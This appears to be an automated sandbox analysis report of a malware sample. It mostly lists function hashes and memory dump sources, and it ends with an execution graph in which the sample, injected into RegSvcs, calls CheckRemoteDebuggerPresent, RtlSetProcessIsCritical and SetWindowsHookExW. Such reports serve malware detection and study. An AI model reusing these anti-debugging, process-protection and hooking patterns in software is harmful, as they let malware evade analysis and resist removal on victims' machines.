                                                              • Opcode ID: d6729014814539d0d8bb114ec6c37f858f599e9e1e7be4f4941d39504e1be7a3
                                                              • Instruction ID: fd241b4c26394a2c4b24a1d9971943af9544c2cef7cf5063901e79d4fa30971b
                                                              • Opcode Fuzzy Hash: d6729014814539d0d8bb114ec6c37f858f599e9e1e7be4f4941d39504e1be7a3
                                                              • Instruction Fuzzy Hash: 45D05E357402098F8B18BA1EC1194623BABAFC520473488E4D0198F665EE64A8408B01
                                                              Function 00E32EDB Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0f344f53627ed57eb8e3d8f507cba33d61d5beda6cc179a66cf4beadbcf56a1
                                                              • Instruction ID: 2d69a10f4a872287b4fa11a903762241a8fdeeee7ef50cf116e111dde45d636a
                                                              • Opcode Fuzzy Hash: b0f344f53627ed57eb8e3d8f507cba33d61d5beda6cc179a66cf4beadbcf56a1
                                                              • Instruction Fuzzy Hash: D4D0A7A51411416AC74DE7A4CA525E7FF9D7A8A2807119AAF8007AE055DE344446CAA1
                                                              Function 00E3361D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69c8de5142d3d1085dc09153ecd34f7f5c612e716f5a050448233f77a19ef5a7
                                                              • Instruction ID: 519e5c3f70f968220888a12e0c8773f45aeca92340e7acb072d78aa23dd3293b
                                                              • Opcode Fuzzy Hash: 69c8de5142d3d1085dc09153ecd34f7f5c612e716f5a050448233f77a19ef5a7
                                                              • Instruction Fuzzy Hash: 07D01771A145089FDB05CFB884D59DEBFB6EB98310F205569D113AA2A0DB385A02AB91
                                                              Function 04BD0788 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1eec31e7dbf0b89dedf252a9b67824c106a1f94960053e2044cc6231b91d083d
                                                              • Instruction ID: b9c50a4fd55dfe3794d21e9d36db05c019fe1353d5f2fe513fc9df76fa661656
                                                              • Opcode Fuzzy Hash: 1eec31e7dbf0b89dedf252a9b67824c106a1f94960053e2044cc6231b91d083d
                                                              • Instruction Fuzzy Hash: E4C0123270051CAB8F057B99A8049EA7B9EFB5C270750C416F94987354CEB18D10A7D5
                                                              Function 00E31DE9 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f71ac1358b9ab77008add5aaa595132835fa28e1c11691efc9793243e7989a31
                                                              • Instruction ID: 8177a1f20f5ac5c86dbe4dbfa63b561604b3b793f93f9abd3cc76833bf00ed21
                                                              • Opcode Fuzzy Hash: f71ac1358b9ab77008add5aaa595132835fa28e1c11691efc9793243e7989a31
                                                              • Instruction Fuzzy Hash: A4D05EB0E00204CFCB48DB98C4A6AAEFBF5AF8C340F15D05AC5097B251CA306841CB75
                                                              Function 00E340B1 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3dff3be7b9089b3c57500d10453809e1bed4356815e09626c2179021ca68acc
                                                              • Instruction ID: eccbed560a993943796b40a417efc8dde4b2d513d201c301f475a28f88da722a
                                                              • Opcode Fuzzy Hash: a3dff3be7b9089b3c57500d10453809e1bed4356815e09626c2179021ca68acc
                                                              • Instruction Fuzzy Hash: 67D05B319205048FCB15CF50C59869BBFB5FF94300F5041A9D103A61A1DB358B04DF50
                                                              Function 00E35BAE Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cb79512e4bcf767751986c60b37dc54006379cefb9417426fc8ed2d58e41d7d
                                                              • Instruction ID: 578f00acdadd3c78c2b40a728a57c1504bf1d1d3f628b7ad221755ea00f78518
                                                              • Opcode Fuzzy Hash: 5cb79512e4bcf767751986c60b37dc54006379cefb9417426fc8ed2d58e41d7d
                                                              • Instruction Fuzzy Hash: 5DD09EB19016168BD758DB30C9546697736AF85705F5094A88449A7264CE31DD85CF00
                                                              Function 00E344C0 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 512bc813145c873cf427f58fe7d8e4715798da8e49b51192ce4759d8d43e9cb8
                                                              • Instruction ID: f6bdc805940f0c9684ca59769e9f3e9881de2a0dfed8ce609c3af6f4ca9aa405
                                                              • Opcode Fuzzy Hash: 512bc813145c873cf427f58fe7d8e4715798da8e49b51192ce4759d8d43e9cb8
                                                              • Instruction Fuzzy Hash: 42D0233190878DCECF12CA3CC8444D7BFF44A02301F1941638461D55E3C0145602D791
                                                              Function 00E34486 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70dc3d32cc1e0eac56686081785d7d5ed4d85b590b5b0f66b8a4847f7cb7b974
                                                              • Instruction ID: 2204edee9280fea42c54d18e0a07c50f41b9b90354dc593939747d4803f6a920
                                                              • Opcode Fuzzy Hash: 70dc3d32cc1e0eac56686081785d7d5ed4d85b590b5b0f66b8a4847f7cb7b974
                                                              • Instruction Fuzzy Hash: 8BD05E32900609CFCB05DFE4C4405AEBEB5FB98300F14402AC102B62A0DA314B01DFA1
                                                              Function 00E34643 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0d11b9f54180492b87ee62a7a8d43b39c882a0efdb67e527aa20deb361e1c18
                                                              • Instruction ID: b700a0f9d26425fb913c53ea3cfea8a0a7db9c6e4c980afc55153e9c2aadd823
                                                              • Opcode Fuzzy Hash: e0d11b9f54180492b87ee62a7a8d43b39c882a0efdb67e527aa20deb361e1c18
                                                              • Instruction Fuzzy Hash: D1D05EB1A4050AAFCF05CF68CA546DEBFB1EB88300F1080B5D107AA2A5DE304F40AF91
                                                              Function 00E33863 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d884ea166121c03ac9dc9c379fe1907778273171c7e6400d1daa24e50c78edef
                                                              • Instruction ID: 13ac90663291ec18aa9e432c078beb3ed87a96fe9985bf00ae31994c19e8d650
                                                              • Opcode Fuzzy Hash: d884ea166121c03ac9dc9c379fe1907778273171c7e6400d1daa24e50c78edef
                                                              • Instruction Fuzzy Hash: 2CD0C931A60619EFCB06CFB0DA849EEFBF2FF58301F11442AE202BA160E7304610DB61
                                                              Function 00E3497B Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c588a5487b05ea68e7159d74c66627bd0d35bf8725c52a48221d8f022d23be5
                                                              • Instruction ID: 3f43f66aa79c082af6b53f2ba179cda62ca7403928881f63f5676cca39f4aa8d
                                                              • Opcode Fuzzy Hash: 1c588a5487b05ea68e7159d74c66627bd0d35bf8725c52a48221d8f022d23be5
                                                              • Instruction Fuzzy Hash: A9D09235900609DFDB55CB68C88979ABBB1FF98300F2091AAC15AA7265DB305A40AF51
                                                              Function 00E32A0F Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69db1101cc5d8ec34343920a6fbd3f31bd57e84a22cbf15d6270eb20a9f3bf3d
                                                              • Instruction ID: 52d615fee51cdb01c7816d7648b48ae6b044fb11198e1e2233335d41ff72b12c
                                                              • Opcode Fuzzy Hash: 69db1101cc5d8ec34343920a6fbd3f31bd57e84a22cbf15d6270eb20a9f3bf3d
                                                              • Instruction Fuzzy Hash: ECD01235A011489FEB0CDAA4C166ABEBFF9AB4C310F11A09A940677750D6309D40CB61
                                                              Function 00E3227B Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aae6423feff0c28d2a32806617ed0e37035804e718370afd9615a71bf3e9f6c3
                                                              • Instruction ID: 5cf612e977ce927bbd80b45d0e23e869ee4264f0405b1dccf0d0aefef5c21d0d
                                                              • Opcode Fuzzy Hash: aae6423feff0c28d2a32806617ed0e37035804e718370afd9615a71bf3e9f6c3
                                                              • Instruction Fuzzy Hash: 3EC08C30A5125486C68CD5A08A26FBEAA69AB48B80F10201E8606BA5C0C6614C009722
                                                              Function 00E32F08 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02268a916e92de123c09955a7fc20ca68d1bfcc2a189f63650e8da9f10ff04bf
                                                              • Instruction ID: 7d6863bc89cad0fa8d0b01f57282aac53b3880dfdac896341b1a5dbadb368c05
                                                              • Opcode Fuzzy Hash: 02268a916e92de123c09955a7fc20ca68d1bfcc2a189f63650e8da9f10ff04bf
                                                              • Instruction Fuzzy Hash: ABB0929035004A4AD708D6868566BBE9A9A97CC340FA0647E570AFB6C4CA2449058626

                                                              Non-executed Functions

                                                              Function 004FD874 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2016723420.00000000004FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                              • Associated: 00000000.00000002.2016682403.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2016705610.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2016806349.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S>i6
                                                              • API String ID: 0-2911695549
                                                              • Opcode ID: 98a234127f05e5f9a9d318029d9cc216367d0e75eb25ea5c0c37ef86c5fd9c71
                                                              • Instruction ID: 7a226c681f2cdaa312195086b27ac73ad63b34e69fdbb9b502065ed8bd84c2b7
                                                              • Opcode Fuzzy Hash: 98a234127f05e5f9a9d318029d9cc216367d0e75eb25ea5c0c37ef86c5fd9c71
                                                              • Instruction Fuzzy Hash: F621376FB6561A1B0B5C887E9E9A437C8CBA7D959024AE73A640BDF79CCC788C0600C4
                                                              Function 004FD9B0 Relevance: .1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2016723420.00000000004FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                              • Associated: 00000000.00000002.2016682403.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2016705610.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2016806349.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46f10706937c768d22726c3b09d4d37b75cb61b66b250ab4adc4c4a7d4e7343b
                                                              • Instruction ID: 1609fa32f6a7f54924b7c3243978990726e2a123969359c854cbd4a012d7a505
                                                              • Opcode Fuzzy Hash: 46f10706937c768d22726c3b09d4d37b75cb61b66b250ab4adc4c4a7d4e7343b
                                                              • Instruction Fuzzy Hash: 7221067BF4522A0B671C8C7F9EE6536C88F27D9160386F72E590AEFAD9DD248C060184
                                                              Function 04C19B48 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e82726832ae2b7553b8567c7b021aaa293470d18d8c81497f15aeb0af4dcc114
                                                              • Instruction ID: f204e90d0a087f8ca9249394c8afcd7492b58839314868bee781b01b2d7a1937
                                                              • Opcode Fuzzy Hash: e82726832ae2b7553b8567c7b021aaa293470d18d8c81497f15aeb0af4dcc114
                                                              • Instruction Fuzzy Hash: A02121B1D016188BEB28CF6B98057DDFBF7AFC9351F04C1BAC518A6255EB340A46CE51
                                                              Function 04BD00BE Relevance: 5.1, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$$jq$$jq
                                                              • API String ID: 0-2428501249
                                                              • Opcode ID: 67d94df335da44b7ebcf966728261c1d4281e2076de015d93db73bb9d1c68c75
                                                              • Instruction ID: 5be2a1e666b54539b2017f9dc6cc5cd5d1859bc4de49adfabf1d5cc6e194e4ad
                                                              • Opcode Fuzzy Hash: 67d94df335da44b7ebcf966728261c1d4281e2076de015d93db73bb9d1c68c75
                                                              • Instruction Fuzzy Hash: 8F115761A0E3C64FC3266F38882416BBF76AF97214F2984EFD4448B297E5349C41C382
                                                              Function 04BD01A8 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ojq$(ojq$4'jq$4'jq
                                                              • API String ID: 0-468369183
                                                              • Opcode ID: 2705a5aa2de0f270a3340925faa7e66bbcd71c815cab73ee8115d812a3ed19a6
                                                              • Instruction ID: ad14fd07c4f1043f04f522aea84ad7275560eea7e465610768a833ff2d4b1c07
                                                              • Opcode Fuzzy Hash: 2705a5aa2de0f270a3340925faa7e66bbcd71c815cab73ee8115d812a3ed19a6
                                                              • Instruction Fuzzy Hash: AEF0C830B402145FC7245D1E8810B27A69AEFC8710F2480EAE8059B394E970DC118795
                                                              Function 04BD0230 Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                              • API String ID: 0-4000621977
                                                              • Opcode ID: 2d3a47612005675ecfac2f3b2b821ddd9c207189e24775c42b6fbe8cc26f5506
                                                              • Instruction ID: c4de5a51a7f42e0d07da7965eba3567264698c7eb75a4f5679444466d2889023
                                                              • Opcode Fuzzy Hash: 2d3a47612005675ecfac2f3b2b821ddd9c207189e24775c42b6fbe8cc26f5506
                                                              • Instruction Fuzzy Hash: 59F0A735F421298B4F2C6D4D8024537BA9BEFC562472480EAC808D7364EA61DD018785

                                                              Execution Graph

                                                              Execution Coverage:10.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:4.5%
                                                              Total number of Nodes:66
                                                              Total number of Limit Nodes:4
                                                              execution_graph 24930 6278210 24931 6278256 24930->24931 24935 62783e0 24931->24935 24940 62783f0 24931->24940 24932 6278343 24936 62783ea 24935->24936 24937 62783ba 24935->24937 24943 6277ddc 24936->24943 24937->24932 24941 6277ddc DuplicateHandle 24940->24941 24942 627841e 24941->24942 24942->24932 24944 6278458 DuplicateHandle 24943->24944 24945 627841e 24944->24945 24945->24932 24946 62730d0 24947 6273114 SetWindowsHookExW 24946->24947 24949 627315a 24947->24949 24865 29a1950 24866 29a1fc9 24865->24866 24867 29a1979 24865->24867 24873 29a2532 24867->24873 24880 29a2580 24867->24880 24868 29a1ab1 24868->24866 24888 6271790 24868->24888 24892 6271779 24868->24892 24874 29a253e 24873->24874 24875 29a2553 24874->24875 24896 29ab890 24874->24896 24901 29ab960 24874->24901 24905 29ab970 24874->24905 24909 29ab8c0 24874->24909 24875->24868 24881 29a258e 24880->24881 24882 29a253e 24880->24882 24883 29a2553 24882->24883 24884 29ab890 CheckRemoteDebuggerPresent 24882->24884 24885 29ab8c0 CheckRemoteDebuggerPresent 24882->24885 24886 29ab970 CheckRemoteDebuggerPresent 24882->24886 24887 29ab960 CheckRemoteDebuggerPresent 24882->24887 24883->24868 24884->24883 24885->24883 24886->24883 24887->24883 24889 62717ad 24888->24889 24918 627149c 24889->24918 24893 62717ad 24892->24893 24894 627149c RtlSetProcessIsCritical 24893->24894 24895 62717e0 24894->24895 24895->24866 24898 29ab895 24896->24898 24897 29ab8b3 24897->24875 24898->24897 24914 29ab570 24898->24914 24902 29ab964 24901->24902 24903 29ab570 CheckRemoteDebuggerPresent 24902->24903 24904 29ab9a1 24903->24904 24904->24875 24906 29ab98e 24905->24906 24907 29ab570 CheckRemoteDebuggerPresent 24906->24907 24908 29ab9a1 24907->24908 24908->24875 24911 29ab89e 24909->24911 24910 29ab8b3 24910->24875 24911->24910 24912 29ab570 CheckRemoteDebuggerPresent 24911->24912 24913 29ab9a1 24912->24913 24913->24875 24915 29ab9d8 CheckRemoteDebuggerPresent 24914->24915 24917 29ab9a1 24915->24917 24917->24875 24919 6271af8 RtlSetProcessIsCritical 24918->24919 24921 62717e0 24919->24921 24921->24866 24922 29a1a80 24923 29a1a88 24922->24923 24926 29a2532 CheckRemoteDebuggerPresent 24923->24926 24927 29a2580 CheckRemoteDebuggerPresent 24923->24927 24924 29a1ab1 24925 29a1fc9 24924->24925 24928 6271790 RtlSetProcessIsCritical 24924->24928 24929 6271779 RtlSetProcessIsCritical 24924->24929 24926->24924 24927->24924 24928->24925 24929->24925

                                                              Executed Functions

                                                              Function 029AB570 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 029ABA4F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470907498.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_29a0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: 0fca57b19e7687e0eb55b9f4646b7a99cd0feef3e014aee9078b9475e8d03607
                                                              • Instruction ID: aeba48764f90aa557b7fc5d830a24f4dc99b70393ce23f8995d85e252889a017
                                                              • Opcode Fuzzy Hash: 0fca57b19e7687e0eb55b9f4646b7a99cd0feef3e014aee9078b9475e8d03607
                                                              • Instruction Fuzzy Hash: 6C2148B19003598FCB10CF9AC484BEEFBF4EF59314F14845AE859A7251D778A944CFA1
                                                              Function 06271490 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 06271B8A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 5c2e7edd3c74a9c5f02f8d6a65d7b3646c5e733c0dd5aeac45cb6f72ad9b7733
                                                              • Instruction ID: a1b3fe8eec862d8aa550b8c25486789f4f0435c22f00a1cf4bdfab4577d2da1b
                                                              • Opcode Fuzzy Hash: 5c2e7edd3c74a9c5f02f8d6a65d7b3646c5e733c0dd5aeac45cb6f72ad9b7733
                                                              • Instruction Fuzzy Hash: DD2180B1915259CFDB10CFA9D884BEEBFF4EF49310F14805AD455A3251D378A944CFA1
                                                              Function 029AB9D0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 029ABA4F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470907498.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_29a0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: c5f9e22e7395883e5753bab3745a5133abe9ee762f8dcc992758cb3018854114
                                                              • Instruction ID: 1995c6ae1186019868dd640bcece08b9a900aa9c2e828d3d65e09abbc44608f5
                                                              • Opcode Fuzzy Hash: c5f9e22e7395883e5753bab3745a5133abe9ee762f8dcc992758cb3018854114
                                                              • Instruction Fuzzy Hash: 4F2145B18002598FCB10CFAAD584BEEFBF4EF49320F14845AE459A3351D778AA44CFA0
                                                              Function 0627149C Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 06271B8A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: b8b18140dc870390847b5ee4c0512c91bea604aa176ce4036af1e01b8c8081dc
                                                              • Instruction ID: 3bf7bd4b9babf2acb7fe40f76a4821289eb971fb74e2b704c57c9530df7b1ab9
                                                              • Opcode Fuzzy Hash: b8b18140dc870390847b5ee4c0512c91bea604aa176ce4036af1e01b8c8081dc
                                                              • Instruction Fuzzy Hash: 08214AB5901259CFDB10CF9AD884BEEBBF4EF59310F14806AE955A3240D778A944CFA1
                                                              Function 06271AF0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 06271B8A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: e01ef5dd0764ecbd9c74b2914adebfc33c062580af1ec3a766f272b6cda99d68
                                                              • Instruction ID: f97d49787a00338e1a911f04d2d53897c8ab98ce35ba489b1eb974c022d3d875
                                                              • Opcode Fuzzy Hash: e01ef5dd0764ecbd9c74b2914adebfc33c062580af1ec3a766f272b6cda99d68
                                                              • Instruction Fuzzy Hash: CC214CB5D012598FCB10CFAAD884BEEBBF4EF59310F14815AE555A3251D338A944CFA1
                                                              Function 06278450 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0627841E,?,?,?,?,?), ref: 062784DF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: bc4ef66134a1bfd7806cfd55b1017e061355c4a1c2ce25fa2d0c6ba5843bd82f
                                                              • Instruction ID: e5f254c423c642231afca52aa206868a604b73d538b1f577577902cd80cac1b7
